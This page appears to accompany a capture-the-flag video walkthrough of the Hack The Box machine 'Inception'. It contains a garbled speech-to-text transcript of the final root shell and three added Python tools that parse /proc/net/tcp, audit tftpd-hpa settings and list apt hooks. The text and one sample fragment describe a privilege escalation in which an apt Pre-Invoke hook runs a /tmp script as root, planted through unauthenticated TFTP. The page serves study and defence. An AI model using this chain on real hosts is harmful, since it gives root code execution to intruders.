help because we don't have TCP dump date so in about 30 seconds we may get a show we may not so I guess one thing we can do quick if we're fast if sector SH we do get a shell from the guest so chances are the guest hasn't installed the host will as well I think I just missed my window and CL VMP 8,000 where's my control see in this window going through to that window Oh probably cuz I'm pinging me it's not paying maybe it's not - see Mavis - n-no - she works it's not ping PS yeah grab it Zack Gill four three three three okay let's start that again and Cl VMP 8,000 listening oh my god I'm just one inhale of commands so I think that window closed date so in about 40 seconds we should get a shell so I'm gonna pause the video and we will resume in probably 40 seconds it's been about 40 seconds so we should get a shell any second now there this and it looks like it may have aired again we drop back to pretty much the same exact prom whoops one temp and we were in dev s hm we're route IP addr for address and it looks like we are on the route machine so I guess I understand why the Machine got its name the user and host name for the guest and route or the exact same so if you didn't notice the directory change when we got that shell let's go up let's see right here then you may have just not noticed you got the river shell because it looks like based upon this error message you just crash and get dropped back to your show but from there they sit down to temp and yeah so forget a root WC - see for a character account because we don't want to show you the flag 33 characters mb 5 some study - you got one line break so this is the host machine and that is your route text and this concludes inception hope you guys enjoyed the video take care and I'll see you next week
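The walkthrough tries to pull /proc/self/net/tcp over FTP because, when it is readable, that table already tells you which ports are open on the host, including services bound only to loopback that the Squid proxy was needed to reach. The following parser is an added example (not IppSec's code or anything from the box): it decodes the kernel's hex address format (little-endian IPv4 plus hex port, state 0A = LISTEN) and reports listeners. The sample table is constructed to resemble the box (a web server on 80, Squid on 3128, SSH on loopback, one established connection); it is not captured output.

```python
"""
Decode /proc/net/tcp to list listening sockets without netstat or nmap.

Added example, not taken from the video. Each row's local_address is
IPv4 as host-order (little-endian on x86) hex followed by a hex port;
column st is the socket state, and uid is the owning user. Constructed
sample data below.
"""
import socket
import struct

TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV",
    "04": "FIN_WAIT1", "05": "FIN_WAIT2", "06": "TIME_WAIT",
    "07": "CLOSE", "08": "CLOSE_WAIT", "09": "LAST_ACK",
    "0A": "LISTEN", "0B": "CLOSING",
}


def decode_endpoint(field):
    """'0100007F:0C38' -> ('127.0.0.1', 3128); IP bytes are little-endian."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the table into dicts with local/remote endpoints, state and uid."""
    rows = []
    for line in text.splitlines()[1:]:   # first line is the column header
        f = line.split()
        if len(f) < 8:
            continue
        rows.append({
            "local": decode_endpoint(f[1]),
            "remote": decode_endpoint(f[2]),
            "state": TCP_STATES.get(f[3], f[3]),
            "uid": int(f[7]),
        })
    return rows


def listeners(text):
    """Sorted (ip, port, uid) for every socket in LISTEN state."""
    return sorted((r["local"][0], r["local"][1], r["uid"])
                  for r in parse_proc_net_tcp(text) if r["state"] == "LISTEN")


def loopback_only(text):
    """Listening ports reachable only from the host itself (127.0.0.0/8)."""
    return sorted(port for ip, port, _ in listeners(text) if ip.startswith("127."))


# constructed sample: web server on 80, Squid on 3128, SSH on loopback,
# and one established client connection from 10.10.14.30 to port 80
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18234 1 0000000000000000 100 0 0 10 0
   1: 00000000:0C38 00000000:0000 0A 00000000:00000000 00:00000000 00000000    13        0 18451 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17990 1 0000000000000000 100 0 0 10 0
   3: 430A0A0A:0050 1E0E0A0A:C2F4 01 00000000:00000000 00:00000000 00000000    33        0 21077 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    for ip, port, uid in listeners(SAMPLE):
        print(f"LISTEN {ip}:{port} (uid {uid})")
    print("loopback-only ports:", loopback_only(SAMPLE))
```

Point the parser at the real file (`open("/proc/net/tcp").read()`) to use it on a host; /proc/net/tcp6 has the same layout with 32 hex digits per address and would need a different decoder.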
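The root-owned file created over TFTP comes down to how tftpd-hpa is configured in /etc/default/tftpd-hpa: the daemon user, the served directory and the `--create` / `--secure` flags in TFTP_OPTIONS. The audit below is an added example, not IppSec's code; it parses that shell-style file and reports the combination observed in the walkthrough (running as root, uploads allowed, no chroot, whole filesystem served) next to a hardened configuration. Both sample files are constructed, not copied from the box.

```python
"""
Audit /etc/default/tftpd-hpa for the settings that allow root-owned writes.

Added example, not from the video. tftpd-hpa reads TFTP_USERNAME,
TFTP_DIRECTORY, TFTP_ADDRESS and TFTP_OPTIONS from this file; --create
lets clients create new files and --secure chroots the daemon into
TFTP_DIRECTORY. The sample configurations are constructed.
"""
import shlex


def parse_defaults(text):
    """Parse KEY="value" lines into a dict, honouring quotes and # comments."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        words = shlex.split(value, comments=True)
        cfg[key.strip()] = words[0] if words else ""
    return cfg


def option_flags(options):
    """Expand TFTP_OPTIONS into a set of flags, splitting combined short flags."""
    flags = set()
    for tok in options.split():
        if tok.startswith("--"):
            flags.add(tok)
        elif tok.startswith("-") and len(tok) > 1:
            flags.update("-" + ch for ch in tok[1:])
    return flags


def audit_tftpd_hpa(text):
    """Return a list of findings; an empty list means none of the risky settings."""
    cfg = parse_defaults(text)
    flags = option_flags(cfg.get("TFTP_OPTIONS", ""))
    findings = []
    if cfg.get("TFTP_USERNAME") == "root":
        findings.append("daemon runs as root: uploaded files are root-owned")
    if flags & {"--create", "-c"}:
        findings.append("--create: clients may create new files, not only overwrite")
    if not flags & {"--secure", "-s"}:
        findings.append("--secure missing: no chroot, absolute client paths are honoured")
    if cfg.get("TFTP_DIRECTORY", "") in ("", "/"):
        findings.append("TFTP_DIRECTORY is the filesystem root")
    return findings


# constructed: a configuration matching what the walkthrough observed
RISKY = """
# /etc/default/tftpd-hpa
TFTP_USERNAME="root"
TFTP_DIRECTORY="/"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="--create"
"""

# constructed: dedicated user, one served directory, chrooted, read-only
HARDENED = """
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/srv/tftp"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="--secure"
"""

if __name__ == "__main__":
    for label, cfg in (("risky", RISKY), ("hardened", HARDENED)):
        print(label, audit_tftpd_hpa(cfg) or ["no findings"])
```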
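The code-execution step rests on apt's hook mechanism: root's /etc/crontab runs `apt upgrade` every five minutes, and apt executes whatever command is listed under `APT::Update::Pre-Invoke` in any fragment under /etc/apt/apt.conf.d. The inventory script below is an added example, not IppSec's code or part of the box; it parses apt.conf syntax (both the flat `Key::Sub "value";` form and nested `Group { Sub { "v"; }; };` blocks) and lists every hook, flagging commands that reach into world-writable directories, which is the pattern used above. The fragment names and contents are constructed.

```python
"""
Inventory apt/dpkg command hooks in apt.conf.d fragments.

Added example, not from the video. apt runs the commands stored under
the hook keys below as root, so a writable fragment directory or a hook
that executes something from /tmp is effectively root code execution.
Sample fragments are constructed. #clear and #include directives are
treated as comments and not expanded.
"""
import re

# apt configuration keys whose values are shell commands apt or dpkg executes
HOOK_KEYS = {
    "APT::Update::Pre-Invoke",
    "APT::Update::Post-Invoke",
    "APT::Update::Post-Invoke-Success",
    "DPkg::Pre-Invoke",
    "DPkg::Post-Invoke",
    "DPkg::Pre-Install-Pkgs",
}

# world-writable locations that no trusted hook should reference
WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# tokens: quoted strings, comments, braces/semicolons, bare words
_TOKEN = re.compile(
    r'"(?:[^"\\]|\\.)*"'      # "quoted value"
    r'|/\*.*?\*/'             # /* block comment */
    r'|(?://|#)[^\n]*'        # // or # line comment
    r'|[{};]'
    r'|[^\s{};"]+',
    re.S,
)


def parse_apt_conf(text):
    """Return [(fully::qualified::key, value), ...] from apt.conf-style text."""
    scope = []       # enclosing group names, e.g. ["APT", "Update"]
    pending = None   # bare word waiting for a value or an opening brace
    pairs = []
    for tok in _TOKEN.findall(text):
        if tok.startswith(("/*", "//", "#")):
            continue                      # comment
        if tok == "{":
            scope.append(pending or "")   # enter the group named by `pending`
            pending = None
        elif tok == "}":
            if scope:
                scope.pop()
        elif tok == ";":
            pending = None
        elif tok.startswith('"'):
            key = "::".join(s for s in scope + [pending or ""] if s)
            pairs.append((key, tok[1:-1]))
        else:
            pending = tok
    return pairs


def find_hooks(text):
    """Only the (key, command) pairs that apt or dpkg will execute."""
    return [(k, v) for k, v in parse_apt_conf(text) if k in HOOK_KEYS]


def audit_fragments(fragments):
    """fragments: {file name: contents}. One finding per hook command."""
    findings = []
    for name in sorted(fragments):        # apt reads fragments in sorted order
        for key, cmd in find_hooks(fragments[name]):
            findings.append({
                "file": name,
                "key": key,
                "command": cmd,
                # a hook reaching into a world-writable directory means anyone
                # who can write there runs code as root on the next apt run
                "suspicious": any(d in cmd for d in WRITABLE_DIRS),
            })
    return findings


# constructed apt.conf.d contents (not taken from a real host)
SAMPLE_FRAGMENTS = {
    "00shell": 'APT::Update::Pre-Invoke {"bash /tmp/ipsec.sh";};\n',
    "20auto-upgrades": (
        'APT::Periodic::Update-Package-Lists "1";\n'
        'APT::Periodic::Unattended-Upgrade "1";\n'
    ),
    "90example-hook": (
        '// vendor-style hook written in nested form\n'
        'DPkg { Post-Invoke { "/usr/lib/example/refresh-cache"; }; };\n'
    ),
}

if __name__ == "__main__":
    for f in audit_fragments(SAMPLE_FRAGMENTS):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['file']}: {f['key']} -> {f['command']}")
```

On a live host, build the `fragments` dict from /etc/apt/apt.conf and every file in /etc/apt/apt.conf.d, and pair the hook inventory with a check that neither location is writable by anyone but root; the upload path in the walkthrough only worked because the fragment directory accepted a root-owned file from an unauthenticated TFTP client.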
Original Description
01:05 - Start of Recon + Finding dompdf
08:30 - PHP Wrappers + Failed testing for RCE
11:35 - Writing Python Program to automate file disclosure bug
18:40 - Finding WebDav Configuration + Uploading Files for RCE
25:50 - Modifying Sokar's Forward Shell (PTY over HTTP)
33:55 - Forward shell returned
38:50 - Using Squid to pivot to ports listening locally + NMAP via ProxyChains
47:48 - Getting nmap on Inception to speed up scanning private network
59:16 - Nmap results returned for 192.168.0.1, FTP Anonymous Login
1:01:15 - Finding TFTP as a Running Service
1:06:35 - Using TFTP to grab crontab & creating a pre-invoke apt script